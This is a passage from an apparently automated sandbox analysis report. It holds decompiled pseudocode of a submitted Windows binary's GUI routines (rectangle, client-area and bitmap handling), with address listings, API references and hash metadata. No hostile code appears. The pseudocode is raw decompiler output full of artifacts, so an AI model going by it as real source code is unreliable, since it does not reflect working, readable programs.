							_t87 =  *((intOrPtr*)(E00CC1A50(_t97, 1, 0, _t121) + 0x7c));
						}
					}
				}
				 *((intOrPtr*)(_t97 + 0x105c)) = _t87;
				 *((intOrPtr*)(_t97 + 0xfb0)) = 0;
				if(E00CF133D(0) == 3 &&  *((intOrPtr*)(E00CC19ED() + 0x1ac)) <= 8) {
					 *0xe885b8 = 0;
					 *((intOrPtr*)(_t97 + 0xf74)) = 1;
				}
				 *((intOrPtr*)(_t97 + 0x1074)) = 0;
				 *((intOrPtr*)(_t97 + 0x1078)) = 0;
				SetRectEmpty(_t97 + 0x107c);
				 *((intOrPtr*)(_t97 + 0xf30)) = 0;
				 *((intOrPtr*)(_t97 + 0x134)) = 0;
				 *((intOrPtr*)(_t97 + 0xf3c)) = 0;
				 *((intOrPtr*)(_t97 + 0xf44)) = 0;
				 *((intOrPtr*)(_t97 + 0x1160)) = 0;
				 *((intOrPtr*)(_t97 + 0x1168)) = 2;
				 *((intOrPtr*)(_t97 + 0x1164)) = 0;
				 *((intOrPtr*)(_t97 + 0x116c)) = 0;
				 *((intOrPtr*)(_t97 + 0x1170)) = 0;
				 *((intOrPtr*)(_t97 + 0xf5c)) = 0;
				 *((intOrPtr*)(_t97 + 0x113c)) = 0;
				 *((intOrPtr*)(_t97 + 0x1140)) = 0;
				 *((intOrPtr*)(_t97 + 0x1144)) = 0;
				_t92 = SetRectEmpty(_t97 + 0x1150);
				 *((intOrPtr*)(_t97 + 0x1130)) = 0;
				 *((intOrPtr*)(_t97 + 0x1134)) = 0;
				 *((intOrPtr*)(_t97 + 0x1138)) = 0;
				 *((intOrPtr*)(_t97 + 0x1148)) = 0;
				 *((intOrPtr*)(_t97 + 0x114c)) = 0;
				 *((intOrPtr*)(_t97 + 0xf40)) = 0;
				 *((intOrPtr*)(_t97 + 0x1070)) = 0;
				return _t92;
			}

0x00d12d79
0x00d12d7c
0x00d12d7d
0x00d12d80
0x00d12d81
0x00d12d83
0x00d12d8a
0x00d12d90
0x00d12d92
0x00d12d92
0x00d12d96
0x00d12da4
0x00d12da8
0x00d12db1
0x00d12db7
0x00d12dbd
0x00d12dc3
0x00d12dc9
0x00d12dcf
0x00d12dd5
0x00d12ddb
0x00d12de1
0x00d12de7
0x00d12ded
0x00d12df3
0x00d12df9
0x00d12dff
0x00d12e06
0x00d12e0c
0x00d12e12
0x00d12e14
0x00d12e1a
0x00d12e22
0x00d12e29
0x00d12e36
0x00d12e3c
0x00d12e42
0x00d12e48
0x00d12e4e
0x00d12e5b
0x00d12e61
0x00d12e66
0x00d12e72
0x00d12e82
0x00d12e84
0x00d12e91
0x00d12e99
0x00d12e9f
0x00d12ea5
0x00d12eab
0x00d12eb1
0x00d12ed3
0x00d12ed3
0x00d12eb3
0x00d12eb3
0x00d12eb9
0x00000000
0x00d12ebb
0x00d12ebb
0x00d12ec0
0x00d12ec7
0x00000000
0x00d12ec9
0x00d12ece
0x00d12ece
0x00d12ec7
0x00d12eb9
0x00d12ed6
0x00d12edc
0x00d12eea
0x00d12efa
0x00d12f00
0x00d12f00
0x00d12f0c
0x00d12f13
0x00d12f19
0x00d12f25
0x00d12f2c
0x00d12f32
0x00d12f38
0x00d12f3e
0x00d12f44
0x00d12f4e
0x00d12f54
0x00d12f5a
0x00d12f60
0x00d12f66
0x00d12f6c
0x00d12f72
0x00d12f78
0x00d12f7f
0x00d12f85
0x00d12f8b
0x00d12f91
0x00d12f97
0x00d12f9d
0x00d12fa3
0x00d12fac

APIs

SetRectEmpty.USER32(?), ref: 00D12E4E
SetRectEmpty.USER32(?), ref: 00D12E5B
SetRectEmpty.USER32(?), ref: 00D12F19
SetRectEmpty.USER32 ref: 00D12F78

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: badd1191cca7665f3e702a7b5ef3393b30a4254843b114d9d818c59b71ca2b2b
Instruction ID: 43108e353192909358c5ff2be568507371f9078ffbcf7433b9dcfe8f3fef0d86
Opcode Fuzzy Hash: badd1191cca7665f3e702a7b5ef3393b30a4254843b114d9d818c59b71ca2b2b
Instruction Fuzzy Hash: B951D1B08212258FCB649F29D5846E63BA8AB09B50F1841BBED4CCF65ACBB05541DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CFF662 Relevance: 6.1, APIs: 4, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CFF662(intOrPtr* __ecx, intOrPtr __edx, struct tagPOINT _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				long _t39;
				int _t55;
				int _t61;
				intOrPtr* _t62;
				intOrPtr* _t65;
				signed int _t87;

				_t82 = __edx;
				_t37 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t37 ^ _t87;
				_t65 = __ecx;
				_t83 =  *((intOrPtr*)(__ecx + 0x370));
				if(_t83 == 0) {
					L14:
					_t39 = 0;
					__eflags = 0;
				} else {
					_t84 =  *((intOrPtr*)( *_t83 + 0x1ac));
					 *0xe17a64();
					if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x1ac))))() == 0) {
						L13:
						_t39 = 3;
					} else {
						_t83 =  *((intOrPtr*)(__ecx + 0x370));
						_t84 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x1a4));
						 *0xe17a64();
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x1a4))))() == 0) {
							goto L13;
						} else {
							 *0xe17a64(_a4.x, _a8, 1);
							_t83 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x334))))();
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							_v40.left = 0;
							_v40.top = 0;
							_v40.right = 0;
							_v40.bottom = 0;
							 *0xe17a64( &_v24,  &_v40);
							 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x32c))))();
							_t55 = IsRectEmpty( &_v24);
							_t84 = _a12;
							if(_t55 == 0) {
								_v24.bottom = _v24.bottom + _t84;
							}
							if(IsRectEmpty( &_v40) == 0) {
								_v40.top = _v40.top - _t84;
							}
							if(_t83 == 2) {
								goto L13;
							} else {
								_push(_a8);
								if(PtInRect( &_v24, _a4.x) != 0) {
									goto L13;
								} else {
									_push(_a8);
									_t61 = PtInRect( &_v40, _a4.x);
									_t97 = _t61;
									if(_t61 != 0) {
										goto L13;
									} else {
										_t62 = E00D88EA3(_t65, _t82, _t97, _a4, _a8, _t84);
										_t82 =  *_t65;
										_t83 = _t62;
										_t84 =  *((intOrPtr*)( *_t65 + 0x1cc));
										 *0xe17a64();
										if( *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x1cc))))() != 0 || _t83 != 2) {
											_t39 = _t83;
										} else {
											goto L14;
										}
									}
								}
							}
						}
					}
				}
				return E00DDCBCE(_t39, _t65, _v8 ^ _t87, _t82, _t83, _t84);
			}

0x00cff662
0x00cff668
0x00cff66f
0x00cff673
0x00cff677
0x00cff67f
0x00cff79f
0x00cff79f
0x00cff79f
0x00cff685
0x00cff687
0x00cff68f
0x00cff69b
0x00cff79a
0x00cff79c
0x00cff6a1
0x00cff6a1
0x00cff6a9
0x00cff6b1
0x00cff6bd
0x00000000
0x00cff6c3
0x00cff6d5
0x00cff6df
0x00cff6e6
0x00cff6e9
0x00cff6ec
0x00cff6ef
0x00cff6f2
0x00cff6f5
0x00cff6f8
0x00cff6fb
0x00cff70d
0x00cff715
0x00cff71b
0x00cff721
0x00cff726
0x00cff728
0x00cff728
0x00cff737
0x00cff739
0x00cff739
0x00cff73f
0x00000000
0x00cff741
0x00cff741
0x00cff753
0x00000000
0x00cff755
0x00cff755
0x00cff75f
0x00cff765
0x00cff767
0x00000000
0x00cff769
0x00cff772
0x00cff777
0x00cff779
0x00cff77b
0x00cff783
0x00cff78f
0x00cff796
0x00000000
0x00000000
0x00000000
0x00cff78f
0x00cff767
0x00cff753
0x00cff73f
0x00cff6bd
0x00cff69b
0x00cff7af

APIs

IsRectEmpty.USER32 ref: 00CFF71B
IsRectEmpty.USER32 ref: 00CFF72F
PtInRect.USER32(?,?,?), ref: 00CFF74B
PtInRect.USER32(?,?,?), ref: 00CFF75F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty
String ID:
API String ID: 4257549173-0
Opcode ID: a9e07e5002c818818d899f3926b87db146a2acba84381c716eeb8db9ea3d685b
Instruction ID: 291806215fb65f94c57428492fbd34c4c4e4d86c6744180028bd2cc89cd15db4
Opcode Fuzzy Hash: a9e07e5002c818818d899f3926b87db146a2acba84381c716eeb8db9ea3d685b
Instruction Fuzzy Hash: 72417C35A002199FCF51DF65C884AEEBBFAEF48750B1440BAE91AE7250DB309F05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE798 Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00CCE798(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t41;
				intOrPtr* _t42;
				intOrPtr* _t70;
				intOrPtr _t87;
				void* _t90;
				intOrPtr* _t94;
				void* _t104;
				void* _t108;

				_t108 = __eflags;
				_t97 = __esi;
				_t91 = __edi;
				_t90 = __edx;
				_push(0x68);
				E00DDD55F(0xe09c07, __ebx, __edi, __esi);
				_t70 = __ecx;
				_push(__ecx);
				_push( *((intOrPtr*)(_t104 + 8)));
				E00CD844E(__ecx, _t104 - 0x6c, __edi, __esi, _t108);
				 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
				_t41 = _t104 - 0x5c;
				_t109 =  *((intOrPtr*)(_t104 - 0x64));
				if( *((intOrPtr*)(_t104 - 0x64)) == 0) {
					_t41 =  *((intOrPtr*)(_t104 - 0x68));
				}
				 *((intOrPtr*)(_t104 - 0x70)) = _t41;
				_t42 = E00CC1A50(_t70, _t91, _t97, _t109);
				 *0xe17a64(_t70);
				 *((intOrPtr*)(_t70 + 0x3dc)) =  *((intOrPtr*)( *((intOrPtr*)( *_t42 + 0x18c))))();
				 *(_t104 - 0x20) = 0;
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				 *((intOrPtr*)(_t104 - 0x18)) = 0;
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				GetClientRect( *(_t70 + 0x20), _t104 - 0x20);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t94 =  *((intOrPtr*)(_t104 - 0x70));
				 *0xe17a64(_t94);
				 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 0x19c))))();
				 *(_t104 - 0x74) = E00CD1875(_t70, _t94);
				 *0xe17a64(E00CCDE94(_t70));
				 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x30))))();
				E00CBA3B4(_t94, 1);
				_t102 =  *((intOrPtr*)( *_t70 + 0x1a8));
				 *0xe17a64(_t94);
				 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 0x1a8))))();
				if( *((intOrPtr*)(_t70 + 0x2fc)) != 0) {
					_t87 =  *((intOrPtr*)(_t70 + 0x334));
					_t102 = _t104 - 0x20;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t104 - 0x2c)) = _t87;
					if( *((intOrPtr*)(_t104 - 0x24)) - _t87 <= 0) {
						_t94 =  *((intOrPtr*)(_t104 - 0x70));
					} else {
						InflateRect(_t104 - 0x30, 0xffffffff, 0xffffffff);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t102 =  *((intOrPtr*)( *_t70 + 0x1ac));
						_t94 =  *((intOrPtr*)(_t104 - 0x70));
						 *0xe17a64(_t94);
						 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 0x1ac))))();
					}
				}
				SelectObject( *(_t94 + 4),  *(_t104 - 0x74));
				E00CD8713(_t104 - 0x6c, _t90);
				return E00DDD50E(_t70, _t94, _t102);
			}

0x00cce798
0x00cce798
0x00cce798
0x00cce798
0x00cce798
0x00cce79f
0x00cce7a4
0x00cce7ac
0x00cce7ad
0x00cce7ae
0x00cce7b3
0x00cce7b7
0x00cce7ba
0x00cce7be
0x00cce7c0
0x00cce7c0
0x00cce7c3
0x00cce7c6
0x00cce7d8
0x00cce7e2
0x00cce7ea
0x00cce7ed
0x00cce7f0
0x00cce7f3
0x00cce7fd
0x00cce80d
0x00cce80e
0x00cce80f
0x00cce810
0x00cce819
0x00cce81d
0x00cce825
0x00cce831
0x00cce841
0x00cce849
0x00cce84f
0x00cce857
0x00cce85f
0x00cce867
0x00cce870
0x00cce872
0x00cce878
0x00cce87e
0x00cce87f
0x00cce880
0x00cce881
0x00cce887
0x00cce88c
0x00cce8c2
0x00cce88e
0x00cce896
0x00cce8a6
0x00cce8a7
0x00cce8a8
0x00cce8a9
0x00cce8aa
0x00cce8b2
0x00cce8b6
0x00cce8be
0x00cce8be
0x00cce88c
0x00cce8cb
0x00cce8d4
0x00cce8de

APIs

__EH_prolog3_GS.LIBCMT ref: 00CCE79F

Part of subcall function 00CD844E: __EH_prolog3.LIBCMT ref: 00CD8455
Part of subcall function 00CD844E: GetClientRect.USER32(00E196B4,?), ref: 00CD84A4

GetClientRect.USER32(?,?), ref: 00CCE7FD
InflateRect.USER32(?,000000FF,000000FF), ref: 00CCE896
SelectObject.GDI32(00000000,?), ref: 00CCE8CB

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Client$H_prolog3H_prolog3_InflateObjectSelect
String ID:
API String ID: 3664266300-0
Opcode ID: 2ceb671f882a03fc768409371d2877eb5f7589ba0f4f23366a288cc623451c00
Instruction ID: dedd36d9d3f3f64705f3f9f3d482b272ef404ed0740aec65d971b1be0993a75a
Opcode Fuzzy Hash: 2ceb671f882a03fc768409371d2877eb5f7589ba0f4f23366a288cc623451c00
Instruction Fuzzy Hash: 95412831E006199FCF01EFA8C844AAEB7B6BF4A710F14416DE815BB391CB75AA05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2F0E Relevance: 6.1, APIs: 4, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00CB2F0E(intOrPtr* __ecx) {
				signed int _v8;
				struct tagRECT _v24;
				long _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				struct HMENU__* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr* _t75;
				void* _t76;
				void* _t77;
				signed int _t81;

				_t34 =  *0xe68dd4; // 0x8d2643c2
				_t35 = _t34 ^ _t81;
				_v8 = _t34 ^ _t81;
				_t75 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					return E00DDCBCE(_t35, _t56, _v8 ^ _t81, _t73, _t75, _t76);
				}
				_push(_t56);
				_push(_t76);
				_t77 = E00CACA6C(0xe19e40, __ecx);
				_t57 = E00CACA6C(0xe1a344, _t75);
				if((E00CB778C(_t75) & 0x40000000) != 0) {
					L7:
					if(_t57 != 0) {
						L10:
						_pop(_t76);
						_pop(_t56);
						goto L11;
					}
					L8:
					_t35 = E00CACA6C(0xe1a170, _t75);
					if(_t35 == 0) {
						_v24.left = _t35;
						_v24.top = _t35;
						_v24.right = _t35;
						_v24.bottom = _t35;
						GetClientRect( *(_t75 + 0x20),  &_v24);
						_t35 =  *(_t75 + 0x58);
						_t73 = _v24.right - _v24.left;
						 *((intOrPtr*)(_t35 + 8)) = _v24.right - _v24.left;
						 *((intOrPtr*)(_t35 + 0xc)) = _v24.bottom - _v24.top;
					}
					goto L10;
				}
				if(_t77 != 0 || _t57 != 0) {
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(_t75 + 0x20),  &_v24);
					E00CB78AC(_t75, 0x80, 0x80040000, 0);
					_v28 = E00CB7738(_t75);
					 *0xe17a64();
					_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t75 + 0x6c))))();
					if(_t46 != 0) {
						_t46 =  *(_t46 + 4);
					}
					_t47 = IsMenu(_t46);
					AdjustWindowRectEx( &_v24, E00CB778C(_t75), _t47, _v28);
					_t35 = E00CB7A83(_t75, 0, 0, 0, _v24.right - _v24.left, _v24.bottom - _v24.top, 0x236);
					goto L7;
				} else {
					goto L8;
				}
			}

0x00cb2f14
0x00cb2f19
0x00cb2f1b
0x00cb2f1f
0x00cb2f25
0x00cb303a
0x00cb3046
0x00cb3046
0x00cb2f2b
0x00cb2f2c
0x00cb2f3e
0x00cb2f4a
0x00cb2f56
0x00cb2ff5
0x00cb2ff7
0x00cb3038
0x00cb3038
0x00cb3039
0x00000000
0x00cb3039
0x00cb2ff9
0x00cb2fff
0x00cb3008
0x00cb300a
0x00cb300d
0x00cb3010
0x00cb3013
0x00cb301d
0x00cb3029
0x00cb302c
0x00cb3032
0x00cb3035
0x00cb3035
0x00000000
0x00cb3008
0x00cb2f5e
0x00cb2f71
0x00cb2f74
0x00cb2f77
0x00cb2f7a
0x00cb2f7d
0x00cb2f90
0x00cb2f9e
0x00cb2fa6
0x00cb2fae
0x00cb2fb2
0x00cb2fb4
0x00cb2fb4
0x00cb2fb8
0x00cb2fd0
0x00cb2ff0
0x00000000
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00CB778C: GetWindowLongA.USER32 ref: 00CB7799

GetClientRect.USER32(?,?), ref: 00CB2F7D
IsMenu.USER32 ref: 00CB2FB8
AdjustWindowRectEx.USER32(?,00000000,00000000,?), ref: 00CB2FD0
GetClientRect.USER32(?,?), ref: 00CB301D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$ClientWindow$AdjustLongMenu
String ID:
API String ID: 3435883281-0
Opcode ID: 2bdac954aa62f11b8b950df2a24dd913169ebbcc2f8f724afb78120f4cd43418
Instruction ID: e5a8f4b63ce995a31fb210d3803a5e715b2843fa042342dccc918b9b0c55ce8a
Opcode Fuzzy Hash: 2bdac954aa62f11b8b950df2a24dd913169ebbcc2f8f724afb78120f4cd43418
Instruction Fuzzy Hash: 93313B71E00219AFDB14EFA9C989AFFBBB9EF48710F14415AE811F7251DB309A04DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD844E Relevance: 6.1, APIs: 4, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CD844E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				struct tagRECT* _t51;
				intOrPtr _t56;
				struct HDC__* _t57;
				intOrPtr _t58;
				intOrPtr _t61;
				struct HDC__* _t62;
				struct HBITMAP__* _t66;
				struct HDC__* _t73;
				intOrPtr _t87;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;

				_push(8);
				E00DDD52C(0xe0a423, __ebx, __edi, __esi);
				_t87 = __ecx;
				 *((intOrPtr*)(_t92 - 0x14)) = __ecx;
				_t73 = 0;
				 *((intOrPtr*)(__ecx)) = 0xe1f1c0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t92 + 8));
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				E00CB9032(__ecx + 0x10);
				 *((intOrPtr*)(_t92 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0xe196b4;
				_t89 =  *((intOrPtr*)(_t92 + 0xc));
				_t51 = __ecx + 0x2c;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				_t51->left = 0;
				_t51->top = 0;
				_t51->right = 0;
				_t51->bottom = 0;
				 *((char*)(_t92 - 4)) = 1;
				GetClientRect( *( *((intOrPtr*)(_t92 + 0xc)) + 0x20), _t51);
				 *((intOrPtr*)(_t87 + 0x34)) =  *((intOrPtr*)(_t87 + 0x34)) + E00CB2B6E( *((intOrPtr*)(_t92 + 0xc)), 0);
				 *((intOrPtr*)(_t87 + 0x38)) =  *((intOrPtr*)(_t87 + 0x38)) + E00CB2B6E(_t89, 1);
				 *((intOrPtr*)(_t92 - 0x10)) = 0;
				if( *((intOrPtr*)(E00CC19ED() + 0x1ec)) == 0) {
					E00CBCABE();
					 *((intOrPtr*)(E00CC19ED() + 0x1ec)) = 1;
				}
				_t56 =  *((intOrPtr*)(_t92 + 8));
				if(_t56 != 0) {
					_t57 =  *(_t56 + 4);
				} else {
					_t57 = _t73;
				}
				_t90 = _t87 + 0x2c;
				_t58 = E00CBCA59(_t57, _t90, 2, _t73, _t92 - 0x10);
				 *((intOrPtr*)(_t87 + 0xc)) = _t58;
				if(_t58 == 0 ||  *((intOrPtr*)(_t92 - 0x10)) == 0) {
					if( *0xe68300 != 0) {
						_t61 =  *((intOrPtr*)(_t87 + 4));
						if(_t61 != 0) {
							_t62 =  *(_t61 + 4);
						} else {
							_t62 = _t73;
						}
						if(E00CB9B84(_t73, _t87 + 0x10, CreateCompatibleDC(_t62)) != 0) {
							_t66 = CreateCompatibleBitmap( *( *((intOrPtr*)(_t87 + 4)) + 4),  *((intOrPtr*)(_t90 + 8)) -  *_t90,  *((intOrPtr*)(_t90 + 0xc)) -  *((intOrPtr*)(_t90 + 4)));
							_t91 = _t87 + 0x20;
							if(E00CB9BC6(_t73, _t91, _t87, _t66) != 0) {
								 *((intOrPtr*)(_t87 + 8)) = 1;
								if(_t91 != 0) {
									_t73 =  *(_t91 + 4);
								}
								 *((intOrPtr*)(_t87 + 0x28)) = E00CBA251( *((intOrPtr*)(_t87 + 0x14)), _t73);
							}
						}
					}
				} else {
					 *((intOrPtr*)(_t87 + 8)) = 1;
					E00CB9B84(_t73, _t87 + 0x10,  *((intOrPtr*)(_t92 - 0x10)));
				}
				return E00DDD4FA(_t87);
			}

0x00cd844e
0x00cd8455
0x00cd845a
0x00cd845c
0x00cd8465
0x00cd8467
0x00cd846d
0x00cd8470
0x00cd8473
0x00cd8476
0x00cd847b
0x00cd847e
0x00cd8481
0x00cd8488
0x00cd848b
0x00cd848e
0x00cd8492
0x00cd8494
0x00cd8497
0x00cd849a
0x00cd84a0
0x00cd84a4
0x00cd84b2
0x00cd84be
0x00cd84c1
0x00cd84cf
0x00cd84d1
0x00cd84db
0x00cd84db
0x00cd84e5
0x00cd84ea
0x00cd84f0
0x00cd84ec
0x00cd84ec
0x00cd84ec
0x00cd84fa
0x00cd84ff
0x00cd8507
0x00cd850c
0x00cd852f
0x00cd8531
0x00cd8536
0x00cd853c
0x00cd8538
0x00cd8538
0x00cd8538
0x00cd8551
0x00cd8566
0x00cd856c
0x00cd8579
0x00cd857b
0x00cd8584
0x00cd8586
0x00cd8586
0x00cd8592
0x00cd8592
0x00cd8579
0x00cd8551
0x00cd8514
0x00cd851a
0x00cd8521
0x00cd8521
0x00cd859c

APIs

__EH_prolog3.LIBCMT ref: 00CD8455
GetClientRect.USER32(00E196B4,?), ref: 00CD84A4

Part of subcall function 00CB2B6E: GetScrollPos.USER32(?,?), ref: 00CB2B9A

Part of subcall function 00CBCABE: GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 00CBCACD
Part of subcall function 00CBCABE: GetProcAddress.KERNEL32(00000000,BufferedPaintInit), ref: 00CBCADD
Part of subcall function 00CBCABE: EncodePointer.KERNEL32(00000000), ref: 00CBCAE6

CreateCompatibleDC.GDI32(?), ref: 00CD8540
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CD8566

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CompatibleCreate$AddressBitmapClientEncodeH_prolog3HandleModulePointerProcRectScroll
String ID:
API String ID: 1015973060-0
Opcode ID: 6008820d903d5e36af230f0baa695e7851890a2d120eced77221b209ebad263f
Instruction ID: c59d621e8e83d4d5e1ad4d3066bc94ddfa8b22d0922065023422b8d8c253a4fd
Opcode Fuzzy Hash: 6008820d903d5e36af230f0baa695e7851890a2d120eced77221b209ebad263f
Instruction Fuzzy Hash: 3F414DB0600606EFDB10EF66D985AAABBF4FF08304F04852EE6199B751DB70E954DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D0E984 Relevance: 6.1, APIs: 4, Instructions: 108
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00D0E984(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				void* _t41;
				CHAR* _t45;
				CHAR* _t49;
				void* _t50;
				CHAR* _t55;
				signed int _t57;
				long _t58;
				intOrPtr _t64;
				intOrPtr* _t65;
				CHAR* _t70;
				char _t79;
				signed int _t85;
				CHAR** _t86;
				CHAR* _t88;
				void* _t89;
				CHAR** _t90;

				_t87 = __esi;
				_push(0x10);
				_t37 = E00DDD52C(0xe0c646, __ebx, __edi, __esi);
				 *(_t89 - 4) =  *(_t89 - 4) & 0x00000000;
				_t64 =  *((intOrPtr*)(_t89 + 0xc));
				if(_t64 == 0 ||  *((intOrPtr*)(_t89 + 8)) == 0) {
					L17:
					return E00DDD4FA(E00CA2975(_t37,  *(_t89 + 0x14) - 0x10));
				} else {
					_t41 = 1;
					_t85 = 0;
					while(_t41 !=  *((intOrPtr*)(_t89 + 0x10))) {
						_t41 = _t41 + _t41;
						_t85 = _t85 + 1;
						if(_t85 < 0xb) {
							continue;
						} else {
							goto L17;
						}
					}
					_push( *(_t89 + 0x14) + 0xfffffff0);
					_t7 = E00CA68F8(_t64, _t85, _t87) + 0x10; // 0x10
					_t88 = _t7;
					 *(_t89 - 0x14) = _t88;
					_t45 =  *(_t89 + 0x18);
					 *(_t89 - 4) = 1;
					__eflags = _t45;
